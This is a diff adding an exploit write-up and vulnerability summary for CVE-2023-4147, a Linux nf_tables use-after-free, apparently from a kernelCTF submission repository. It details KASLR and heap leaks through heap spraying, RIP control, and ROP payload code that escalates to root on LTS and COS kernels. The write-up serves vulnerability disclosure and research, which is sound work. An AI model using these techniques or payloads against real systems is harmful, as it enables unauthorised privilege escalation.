google · kevinrich1337 · Jul 11, 2024 · Jul 11, 2024 · Sep 29, 2024 · Sep 29, 2024
diff --git a/pocs/linux/kernelctf/CVE-2023-4147_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-4147_lts_cos/docs/exploit.md
@@ -0,0 +1,377 @@
+### Triggering Vulnerability
+
+`nf_tables_newrule` disallows adding a new rule to a bound chain [1]. However, when the chain is looked up via `NFTA_RULE_CHAIN_ID`, this check is missing, so a rule can still be added to a bound chain [2].
+
+```c
+static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+			     const struct nlattr * const nla[])
+{
+    ...
+
+	table = nft_table_lookup(net, nla[NFTA_RULE_TABLE], family, genmask,
+				 NETLINK_CB(skb).portid);
+	if (IS_ERR(table)) {
+		NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_TABLE]);
+		return PTR_ERR(table);
+	}
+
+	if (nla[NFTA_RULE_CHAIN]) {
+		chain = nft_chain_lookup(net, table, nla[NFTA_RULE_CHAIN],
+					 genmask);
+		if (IS_ERR(chain)) {
+			NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN]);
+			return PTR_ERR(chain);
+		}
+		if (nft_chain_is_bound(chain))                  // [1]
+			return -EOPNOTSUPP;
+
+	} else if (nla[NFTA_RULE_CHAIN_ID]) {
+		chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID]);     // [2]
+		if (IS_ERR(chain)) {
+			NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN_ID]);
+			return PTR_ERR(chain);
+		}
+	} else {
+		return -EINVAL;
+	}
+```
+
+### LTS Exploit
+
+#### KASLR Bypass
+
+The KASLR address is leaked through `chain->name`, which is stored in the verdict data of the immediate expr (`nft_immediate_expr.data.verdict`). The leak process is as follows:
+
+- Create three chains, `Base`, `Vulnerable`, and `Victim`. Set `NFT_CHAIN_BINDING` flag for `Vulnerable`.
+- Create a rule in `Base` with an immediate expr referencing the `Vulnerable`.
+- Create a rule in `Vulnerable` with an immediate expr referencing `Victim`.
+- Trigger the vulnerability by replacing the rule in `Vulnerable`. This results in the `Victim` having a reference count of -1.
+- Create an immediate expr in `Base` that references `Victim`, bringing `Victim`'s reference count to 0, and then destroy `Victim`.
+- Spray counter exprs (`struct nft_expr`) so that one of them is placed at `Victim`'s freed `chain->name`. At this time, the counter exprs are allocated in `kmalloc-cg-16`.
+- Dump the immediate expr of `Base` using the `GETRULE` command. This reads the ops address of the counter expr through the freed `chain->name`, from which we get the kernel base address [3].
+
+```c
+int nft_verdict_dump(struct sk_buff *skb, int type, const struct nft_verdict *v)
+{
+    struct nlattr *nest;
+
+    nest = nla_nest_start_noflag(skb, type);
+    if (!nest)
+        goto nla_put_failure;
+
+    if (nla_put_be32(skb, NFTA_VERDICT_CODE, htonl(v->code)))
+        goto nla_put_failure;
+
+    switch (v->code) {
+    case NFT_JUMP:
+    case NFT_GOTO:
+        if (nla_put_string(skb, NFTA_VERDICT_CHAIN,
+                    v->chain->name))  // [3]
+            goto nla_put_failure;
+    }
+    nla_nest_end(skb, nest);
+    return 0;
+
+nla_put_failure:
+    return -1;
+}
+```
+
+#### Heap Address Leak
+
+We leak the heap address in the same way as we leak the kernel base address. To leak the heap address, we spray `nft_rule` objects instead of counter exprs. We place an `nft_rule` in the freed `Victim`'s `nft_chain->name` and dump the rule of `Base`. As a result, we can read the heap address stored in `nft_rule->list` through `Victim`'s `nft_chain->name`. By creating `nft_rule`s, we put the address of a `kmalloc-cg-96` object in `list->next` and the address of a `kmalloc-cg-192` object in `list->prev`. The size of an `nft_rule` can be adjusted by adding multiple `nft_expr`s inside it. Since the leak goes through string data, it stops at the first null byte, so we repeat the entire exploit until the heap address contains no null bytes.
+
+#### RIP Control
+
+We use `nft_chain->blob_gen_0` to control the RIP. The `nft_chain->blob_gen_0` is used when evaluating packets in the `nft_do_chain` function [4].
+
+```c
+nft_do_chain(struct nft_pktinfo *pkt, void *priv)
+{
+    ...
+do_chain:
+    if (genbit)
+        blob = rcu_dereference(chain->blob_gen_1);
+    else
+        blob = rcu_dereference(chain->blob_gen_0);  // [4]
+
+    rule = (struct nft_rule_dp *)blob->data;
+    last_rule = (void *)blob->data + blob->size;
+next_rule:
+    regs.verdict.code = NFT_CONTINUE;
+    for (; rule < last_rule; rule = nft_rule_next(rule)) {
+        nft_rule_dp_for_each_expr(expr, last, rule) {
+            if (expr->ops == &nft_cmp_fast_ops)
+                nft_cmp_fast_eval(expr, &regs);
+            else if (expr->ops == &nft_cmp16_fast_ops)
+                nft_cmp16_fast_eval(expr, &regs);
+            else if (expr->ops == &nft_bitwise_fast_ops)
+                nft_bitwise_fast_eval(expr, &regs);
+            else if (expr->ops != &nft_payload_fast_ops ||
+                    !nft_payload_fast_eval(expr, &regs, pkt))
+                expr_call_ops_eval(expr, &regs, pkt);
+
+            if (regs.verdict.code != NFT_CONTINUE)
+                break;
+        }
+    ...
+```
+
+To do this, we arrange for `chain->blob_gen_0` to be allocated in `kmalloc-cg-64` and trigger the vulnerability. `chain->blob_gen_0` is allocated by `nf_tables_chain_alloc_rules` when creating a new chain [5].
+
+```c
+static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+			      u8 policy, u32 flags,
+			      struct netlink_ext_ack *extack)
+{
+    ...
+	data_size = offsetof(struct nft_rule_dp, data);	/* last rule */
+	blob = nf_tables_chain_alloc_rules(data_size);      // [5]
+	if (!blob) {
+		err = -ENOMEM;
+		goto err_destroy_chain;
+	}
+```
+
+The size passed to `kvmalloc` [6] is 40: `offsetof(struct nft_rule_dp, data)` + `sizeof(struct nft_rule_blob)` + `sizeof(struct nft_rules_old)` (8 + 8 + 24). Therefore, the `blob` object is allocated in `kmalloc-cg-64`.
+
+```c
+static struct nft_rule_blob *nf_tables_chain_alloc_rules(unsigned int size)
+{
+	struct nft_rule_blob *blob;
+
+	/* size must include room for the last rule */
+	if (size < offsetof(struct nft_rule_dp, data))
+		return NULL;
+
+	size += sizeof(struct nft_rule_blob) + sizeof(struct nft_rules_old);
+	if (size > INT_MAX)
+		return NULL;
+
+	blob = kvmalloc(size, GFP_KERNEL_ACCOUNT);      // [6]
+	if (!blob)
+		return NULL;
+
+	blob->size = 0;
+	nft_last_rule(blob, blob->data);
+
+	return blob;
+}
+```
+
+We then spray the `udata` of the `struct nft_table` and place it in freed `blob_gen_0`. Finally, when a packet is sent, a sprayed fake ops address is referenced, resulting in RIP control [7].
+
+```c
+static void expr_call_ops_eval(const struct nft_expr *expr,
+                    struct nft_regs *regs,
+                    struct nft_pktinfo *pkt)
+{
+#ifdef CONFIG_RETPOLINE
+    unsigned long e = (unsigned long)expr->ops->eval;
+#define X(e, fun) \
+    do { if ((e) == (unsigned long)(fun)) \
+        return fun(expr, regs, pkt); } while (0)  // [7]
+
+    X(e, nft_payload_eval);
+    X(e, nft_cmp_eval);
+    X(e, nft_counter_eval);
+    X(e, nft_meta_get_eval);
+    X(e, nft_lookup_eval);
+    X(e, nft_range_eval);
+    X(e, nft_immediate_eval);
+    X(e, nft_byteorder_eval);
+    X(e, nft_dynset_eval);
+    X(e, nft_rt_get_eval);
+    X(e, nft_bitwise_eval);
+#undef  X
+#endif /* CONFIG_RETPOLINE */
+    expr->ops->eval(expr, regs, pkt);
+}
+```
+
+#### Post RIP
+
+Store the ROP payload below to the `kmalloc-cg-96` and `kmalloc-cg-192` addresses leaked above, and execute it.
+
+```c
+void make_payload(uint64_t* data){
+    int i = 0;
+
+    data[i++] = kbase + push_rbx_pop_rsp;
+
+    // commit_creds(&init_cred)
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = kbase + init_cred_off;
+    data[i++] = kbase + commit_creds_off;
+
+    // current = find_task_by_vpid(getpid())
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = getpid();
+    data[i++] = kbase + find_task_by_vpid_off;
+
+    // current += offsetof(struct task_struct, rcu_read_lock_nesting)
+    data[i++] = kbase + pop_rsi_ret;
+    data[i++] = 0x474;
+    data[i++] = kbase + add_rax_rsi_ret;
+
+    data[i++] = kbase + pop_rsp_ret;
+    data[i++] = heap_addr1+0x20;
+}
+
+void make_payload2(uint64_t* data){
+    int i = 0;
+
+    // current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
+    data[i++] = kbase + pop_rcx_ret;
+    data[i++] = -0xffff;
+    data[i++] = kbase + mov_rax_rcx_ret;
+
+    // find_task_by_vpid(1)
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = 1;
+    data[i++] = kbase + find_task_by_vpid_off;
+
+    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
+    data[i++] = kbase + mov_rdi_rax_ret;
+    data[i++] = kbase + pop_rsi_ret;
+    data[i++] = kbase + init_nsproxy_off;
+    data[i++] = kbase + switch_task_namespaces_off;
+
+    // return to user mode
+    data[i++] = kbase + swapgs_restore_regs_and_return_to_usermode_off;
+    data[i++] = 0;                  // rax
+    data[i++] = 0;                  // rdx
+    data[i++] = _user_rip;          // user_rip
+    data[i++] = _user_cs;           // user_cs
+    data[i++] = _user_rflags;       // user_rflags
+    data[i++] = _user_sp;           // user_sp
+    data[i++] = _user_ss;           // user_ss
+}
+```
+
+### COS Exploit
+
+#### Information Leak
+
+The KASLR address and heap address are leaked through `nft_rule` allocated in `kmalloc-cg-192`. The leak process is as follows:
+
+- Create four chains, `Base`, `Vulnerable`, `Chain_Victim`, and `Target`. Set `NFT_CHAIN_BINDING` flag for `Vulnerable`.
+- Create chains `Chain_Victim2_n`.
+- Create an anonymous rhash set `Set_Victim`.
+- Create a set element in set `Set_Victim`. The element is allocated in `kmalloc-cg-256`.
+
+- Create rules `Rule_Victim2_n` in `Chain_Victim2_n`. The rules are allocated in `kmalloc-cg-192`.
+- Create rules `Rule_Target_n` in `Target` with a `counter expr`. The rules are allocated in `kmalloc-cg-192`. The kbase and heap address in `Rule_Target_n` are used for the leak in a following step. We can read the target rule allocated right after `Rule_Victim2_n`.
+- Create rules `Rule_Victim_n` in `Chain_Victim` with an `immediate expr` referencing the `Chain_Victim2_n`. The rules are allocated in `kmalloc-cg-256`.
+
+- Create a rule `R1` in `Base` with an `immediate expr` referencing the `Vulnerable`.
+- Create a rule `R2` in `Vulnerable` with a `lookup expr` referencing the `Set_Victim`.
+- Delete `R1`. This results in `Set_Victim` being freed in the destroy phase.
+- Delete the set element in `Set_Victim`. This results in a UAF that references the `Set_Victim` that was freed in the previous step.
+
+```c
+static void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,
+				       const struct nft_set *set, void *elem)
+{
+	struct nft_set_ext *ext = nft_set_elem_ext(set, elem);          // [8]
+
+	if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPRESSIONS))
+		nft_set_elem_expr_destroy(ctx, nft_set_ext_expr(ext));      // [9]
+
+	kfree(elem);
+}
+```
+
+```c
+static inline struct nft_set_ext *nft_set_elem_ext(const struct nft_set *set,
+						   void *elem)
+{
+	return elem + set->ops->elemsize;                       // [10]
+}
+```
+
+- Spray rhash sets `Set_Spray_n`. When an element is destroyed in `nf_tables_set_elem_destroy`, its `nft_set_ext` is used [8], and the `nft_set_ext` is located by referencing `set->ops->elemsize` [10]. Thus, when a rhash set with an `elemsize` of 8 is overwritten by an rbtree set with an `elemsize` of 24, `nft_set_elem_expr_destroy` references the wrong `nft_set_ext`. We manipulate the offset to destroy the `immediate expr` in `Rule_Victim_n`, which is allocated after the element, in [9]. This frees `Rule_Victim2_n` in `Chain_Victim2_n`. However, `Chain_Victim2_n` and `Rule_Victim2_n` remain accessible.
+- Spray fake rules using `nft_table->udata` into freed `Rule_Victim2_n` (`kmalloc-cg-192`).
+- Get fake rule to obtain kbase (`nft_counter_ops`) and heap address (`nft_rule.list.next` and `nft_rule.list.prev`).
+
+#### RIP Control
+
+- Create two chains, `Base`, `Vulnerable`. Set `NFT_CHAIN_BINDING` flag for `Vulnerable`.
+- Create an anonymous rbtree set `Set_Victim`.
+- Create a set element in set `Set_Victim`. The element is allocated in `kmalloc-cg-256`.
+- Spray fake exprs using `table->udata` in `kmalloc-cg-256`.
+- Create a rule `R1` in `Base` with an `immediate expr` referencing the `Vulnerable`.
+- Create a rule `R2` in `Vulnerable` with a `lookup expr` referencing the `Set_Victim`.
+- Delete `R1`. This results in `Set_Victim` being freed in the destroy phase.
+- Delete the set element in `Set_Victim`. This results in a UAF that references the `Set_Victim` that was freed in the previous step.
+- Create rhash sets `Set_Spray_n`. As a result, the RIP is controlled by referencing the fake expr in the `nf_tables_expr_destroy` [11].
+
+```c
+static void nf_tables_expr_destroy(const struct nft_ctx *ctx,
+				   struct nft_expr *expr)
+{
+	const struct nft_expr_type *type = expr->ops->type;
+
+	if (expr->ops->destroy)
+		expr->ops->destroy(ctx, expr);      //  [11]
+	module_put(type->owner);
+}
+```
+
+#### Post RIP
+
+Since RIP control is performed by the destroy worker, we split the ROP into two phases. In the first ROP payload, we overwrite `counter_ops` with `fake ops` address.
+
+```c
+void make_payload(uint64_t* data){
+    int i = 0;
+
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = kbase + counter_ops_addr_off;
+
+    data[i++] = kbase + pop_rsi_ret;
+    data[i++] = heap_addr+0x40;             // fake ops
+    data[i++] = kbase + mov_ptr_rdi_rsi;
+    data[i++] = kbase + msleep_off;
+
+    data[i++] = 0;
+    data[i++] = kbase + push_rbx_pop_rsp_pop_rbp_ret;
+    data[i++] = 0;
+    data[i++] = 0;
+    data[i++] = 8;                          // ops.size
+    data[i++] = kbase + push_rsi_jmp_rsi_f; // ops.init
+}
+```
+
+Then, when a `counter expr` is created, the fake `ops->init` is called and the second ROP payload is executed to get the root shell.
+
+```c
+void make_payload2(uint64_t* data){
+    int i = 0;
+
+    // commit_creds(&init_cred)
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = kbase + init_cred_off;
+    data[i++] = kbase + commit_creds_off;
+
+    // find_task_by_vpid(1)
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = 1;
+    data[i++] = kbase + find_task_by_vpid_off;
+
+    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
+    data[i++] = kbase + mov_rdi_rax_ret;
+    data[i++] = kbase + pop_rsi_ret;
+    data[i++] = kbase + init_nsproxy_off;
+    data[i++] = kbase + switch_task_namespaces_off;
+
+    data[i++] = kbase + swapgs_restore_regs_and_return_to_usermode_off;
+    data[i++] = 0;                  // rax
+    data[i++] = 0;                  // rdx
+    data[i++] = _user_rip;          // user_rip
+    data[i++] = _user_cs;           // user_cs
+    data[i++] = _user_rflags;       // user_rflags
+    data[i++] = _user_sp;           // user_sp
+    data[i++] = _user_ss;           // user_ss
+}
+```
diff --git a/pocs/linux/kernelctf/CVE-2023-4147_lts_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-4147_lts_cos/docs/vulnerability.md
@@ -0,0 +1,12 @@
+- Requirements:
+    - Capabilities: CAP_NET_ADMIN
+    - Kernel configuration: CONFIG_NETFILTER=y, CONFIG_NF_TABLES=y
+    - User namespaces required: Yes
+- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d0e2c7de92c7
+- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0ebc1064e4874d5987722a2ddbc18f94aa53b211
+- Affected Version: v5.9-rc1 - v6.5-rc3
+- Affected Component: net/netfilter
+- Syscall to disable: disallow unprivileged user namespaces
+- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-4147
+- Cause: Use-After-Free
+- Description: A use-after-free flaw was found in the Linux kernel's Netfilter functionality when adding a rule with NFTA_RULE_CHAIN_ID. This flaw allows a local user to crash or escalate their privileges on the system.